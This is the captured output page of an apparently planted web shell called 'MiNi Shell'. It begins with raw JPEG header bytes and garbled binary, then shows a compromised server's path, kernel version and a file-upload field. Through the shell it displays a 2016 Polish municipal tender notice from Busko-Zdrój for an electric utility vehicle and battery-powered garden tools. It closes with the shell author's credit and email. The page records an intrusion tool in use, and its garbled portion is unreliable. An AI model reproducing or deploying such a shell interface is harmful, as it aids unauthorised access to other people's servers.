JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160701/113975-N-2016.html

<p class="kh_header"><b>Busko-Zdrój: Zakup i dostawa sprzętu z napędem akumulatorowym oraz samochodu typu pick-up z zasilaniem akumulatorowym</b><br>
<b>Numer ogłoszenia: 113975 - 2016; data zamieszczenia: 01.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu z napędem akumulatorowym oraz samochodu typu pick-up z zasilaniem akumulatorowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
W ramach zakresu Nr 1:
Zakup, dostawa i ologowanie samochodu elektrycznego bagażowego  - 1 szt.
Minimalne wymagane parametry samochodu:
1) pojazd samowyładowczy z kabiną ogrzewaną dwuosobową zamykaną drzwiami,
2) skrzynia o ładowności od 700 kg do 1200 kg.
3) napędzany sinikiem elektrycznym prądu przemiennego o mocy nie mniejszej niż 5kW, zasilany z akumulatorów o napięciu nie mniejszym niż  48V o pojemności minimum 220 Ah (w cyklu 20h).
4) zasięg przy maksymalnej ładowności nie mniej niż  60km, prędkość maksymalna minimum 25km/h.
5) rok produkcji 2016 - pojazd fabrycznie nowy. 
6) minimalny okres gwarancji, obejmującej serwisowanie i bieżącą konserwację dostarczonego samochodu elektrycznego wynosi 24 miesiące.
7) obsługa techniczna w czasie gwarancji na koszt dostawcy.
8) pojazd musi spełniać warunki techniczne wymagane dla pojazdu wolnobieżnego w ruchu drogowym na drogach publicznych, posiadać odpowiednie certyfikaty i deklaracje zgodności z normami i przepisami obowiązującymi dla tego rodzaju pojazdów.
9) autoryzowany serwis w odległości nie większej niż 150 km od siedziby Zamawiającego
10) zamówienie obejmie zakup, dostawę, szkolenie pracownika oraz uruchomienie pojazdu na koszt dostawcy (wliczone w cenę).
11) przedni zderzak;
12) szyba przednia z wycieraczką i spryskiwaczem;
13) przednie światła jazdy dziennej led;
14) ogrzewanie kabiny zasilane olejem napędowym;
15) zagłówki;
16) pasy bezpieczeństwa;
17) wskaźniki: prędkości, naładowania baterii, licznik mtg, podświetlenie ideogramów wyłączników;
18) hamulce hydrauliczne;
19) koła nie mniejsze niż  13 cali;
20) dwie lampy ostrzegawcze led, barwy pomarańczowej, zamontowane na dachu kabiny, zsynchronizowane z homologacją europejską;
21) tylne oświetlenie LED;
22) dźwiękowy sygnał cofania;
23) skrzynia ładunkowa o wymiarach minimalnych 1,15m X 1,70m, burty aluminiowe otwierane burtą tylną;
24) podnoszenie skrzyni ładunkowej elektrohydrauliczne; 
25) nadstawki siatkowe burt skrzyni ładunkowej z drzwiczkami w prawej  i lewej nadstawce;
26) hak holowniczy 
27) prostownik-ładowarkę akumulatorów;
28) podłogi ze stali nierdzewnej lub aluminium;
29) rama galwanizowana;
30) dodatkowy komplet kół z oponami zimowymi;
31) instrukcja obsługi w języku polskim 1 szt.;
32) kolor dominujący kabiny biały
33) kolor ramy czarny;
34) kolor tapicerki czarny;
35) apteczka typu autobusowego;
36) gaśnica;
37) trójkąt ostrzegawczy;
38) trójkąt powolności.
39) czas reakcji serwisu nie dłuższy niż 2 dni robocze.
40) jeżeli naprawa w okresie gwarancji okaże się dłuższa niż 10 dni roboczych od zgłoszenia, Wykonawca zapewni dostawę pojazdu zamiennego o podobnych parametrach technicznych na czas naprawy.
41) transport pojazdu do serwisu w okresie gwarancji na koszt Wykonawcy
42) wykonanie ologowania samochodu z napędem akumulatorowym w loga Instytucji Dofinansowującej zgodnie z wytycznymi Szwajcarsko - Polskiego Programu Współpracy zgodnie z pkt. 3.3. Zasady oznakowania projektów, podpunkt 3.4.1.c). (adres internetowy do wytycznych: https://www.programszwajcarski.gov.pl/media/3302/Informacja_promocja_wytyczne.pdf). Loga powinny zostać wykonane na obydwóch drzwiach samochodu. Loga powinny zostać wielkościowo dostosowane do gabarytów drzwi, na których zostaną umieszczone.  
Charakterystyka ologowania samochodu:
- wykonane z idealnie cienkiej folii, wycinane, bez tła,
- folia zapewniająca ochronę lakieru przez cały okres jego użytkowania,
- w pełni odporne na zabrudzenia, 
- odporne na trudne warunki atmosferyczne, 
- odporne na promienie uv, 
- odporne na szczotki na myjniach samochodowych,
- ładne, nasycone kolory logo,
- odporne na blaknięcie,
- odporne na odklejenie,
- odporne na kurczenie oraz odporne na pękanie 
43) Ilekroć w niniejszej SIWZ zostaną wskazane znaki towarowe, patenty lub pochodzenia, Zamawiający dopuszcza składanie ofert równoważnych. Jednocześnie ilekroć opisując przedmiot zamówienia Zamawiający posługuje się normami, aprobatami, specyfikacjami technicznymi czy systemami odniesienia, dopuszcza się rozwiązania równoważne opisywanym (zgodnie z art. 30 ust. 4 ustawy Pzp). 
W ramach zakresu Nr 2: Zakup i dostawa urządzeń z napędem akumulatorowym, tj. 1) Dmuchawy akumulatorowej - 1 szt. o parametrach nie gorszych niż: 1.1 silnik bezszczotkowy 1.2 zasilanie nie mniejsze niż 36V 1.3 pojemność nie mniejsza niż 2.5 Ah, 1.4 akumulator i ładowarka w komplecie 1.5 średni czas pracy nie mniej niż 20 min 1.6 wydajność turbiny nie mniejsza niż 5 m3/min 1.7 akumulator zapasowy - 1 szt. 1.8 zestaw odkurzający 1.9 gwarancja nie mniejsza niż 12 miesięcy 2) Pilarki łańcuchowej akumulatorowej- 1 szt. o parametrach nie gorszych niż: 2.1 silnik bezszczotkowy 2.2 zasilanie nie mniejsze niż 36V 2.3 pojemność nie mniejsza niż 2.5 Ah, 2.4 akumulator i ładowarka w komplecie 2.5 średni czas pracy nie mniej niż 20 min 2.6 długość prowadnicy nie mniejsza niż 25 cm 2.7 typ łańcucha nie mniejszy niż 3/8cala 2.8 system szybkiego napinania łańcucha 2.9 akumulator zapasowy - 1 szt. 2.10 gwarancja nie mniejsza niż 12 miesięcy 3) Pilarki łańcuchowej akumulatorowa na wysięgniku - 1 szt. o parametrach nie gorszych niż: 3.1 zasilanie nie mniejsze niż 36 V 3.2 pojemność nie mniejsza niż 2.5 Ah, 3.3 akumulator i ładowarka w komplecie 3.4 średni czas pracy nie mniej niż 20 min 3.5 długość prowadnicy nie mniej niż 20 cm 3.6 akumulator zapasowy - 1 szt. 3.7 gwarancja nie mniejsza niż 12 miesięcy 4) Nożyce do żywopłotu akumulatorowe - 1 szt. o parametrach nie gorszych niż: 4.1 zasilanie nie mniejsze niż 36 V 4.2 pojemność: nie mniejsza niż 2.5 Ah, 4.3 akumulator i ładowarka w komplecie 4.4 średni czas pracy nie mniej niż 20 min 4.5 długość ostrza: nie mniej niż 40 cm 4.6 akumulator zapasowy - 1 szt. 4.7 gwarancja nie mniejsza niż 12 miesięcy 5) Opryskiwacz plecakowy akumulatorowy - 1szt. o parametrach nie gorszych niż: 5.1 zasilanie nie mniejsze niż 12 V 5.2 pojemność nie mniej niż 5.0 Ah, 5.3 akumulator i ładowarka w komplecie 5.4 średni czas pracy nie mniej niż 3 godziny 5.5 pojemność zbiornika nie mniejsza niż 12 litrów 5.6 akumulator zapasowy - 1 szt. 5.7 gwarancja nie mniejsza niż 12 miesięcy 6) Kosa akumulatorowa - 1szt. o parametrach nie gorszych niż: 6.1 zasilanie nie mniejsze niż 36V 6.2 pojemność nie mniejsze niż 2.5 Ah, 6.3 akumulator i ładowarka w komplecie 6.4 średni czas pracy nie mniej niż 20 min 6.5 szerokość koszenia nie mniej niż 30 cm 6.6 akumulator zapasowy - 1 szt. 6.7 gwarancja nie mniejsza niż 12 miesięcy 7) Pilarka tarczowa akumulatorowa - 1 szt. o parametrach nie gorszych niż: 7.1 Zasilanie nie mniejsze niż 12 V 7.2 pojemność nie mniej niż 2.5 Ah, 7.3 akumulator i ładowarka w komplecie 7.4 średni czas pracy nie mniej niż 30 min 7.5 średnica tarczy nie mniejsza niż 165 mm 7.6 akumulator zapasowy - 1 szt. 7.7 gwarancja nie mniejsza niż 12 miesięcy 8) Wszystkie urządzenia wymienione w pkt. od 1 - 7 powinny zostać oklejone naklejkami promocyjnymi zawierającymi informacje o źródle dofinasowania projektu. Naklejki powinny zastać wykonane według wytycznych SPPW o wymiarach 10 x5 cm w kolorze, z informującą o podmiocie dotującym inwestycje. 9) Ilekroć w niniejszej SIWZ zostaną wskazane znaki towarowe, patenty lub pochodzenia Zamawiający dopuszcza składanie ofert równoważnych. Jednocześnie ilekroć opisując przedmiot zamówienia Zamawiający posługuje się normami, aprobatami, specyfikacjami technicznymi czy systemami odniesienia, dopuszcza się rozwiązania równoważne opisywanym (zgodnie z art. 30 ust. 4 ustawy Pzp). 2. Gwarancja wraz z serwisem i konserwacją samochodu elektrycznego oraz sprzętu elektrycznego - Minimalny okres gwarancji, obejmującej serwisowanie i bieżącą konserwację dostarczonego samochodu elektrycznego wynosi 24 miesiące. - Minimalny okres gwarancji, obejmującej serwisowanie i bieżącą konserwację dostarczonego sprzętu elektrycznego wynosi 12 miesięcy. Koszty serwisowania i konserwacji Oferent uwzględni w cenie oferty.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.49.00-7, 31.60.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1; 2. Pisemne zobowiązanie innych podmiotów, o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych tych podmiotów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy. 1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności. 2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, poza nieistotnymi zmianami tj. zmianami, które nie mają wpływu na tzw. konieczne warunki Umowy (termin, zakres, wartość Umowy), może nastąpić w następujących przypadkach: 2.1. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadku wystąpienia okoliczności, niezależnych od Wykonawcy, uniemożliwiających terminową jego realizację. 2.2. Zmiana zakresu rzeczowego umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie przygotowania zamówienia. 2.3. Zmiana wartości przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach: a) urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. Nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2016 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com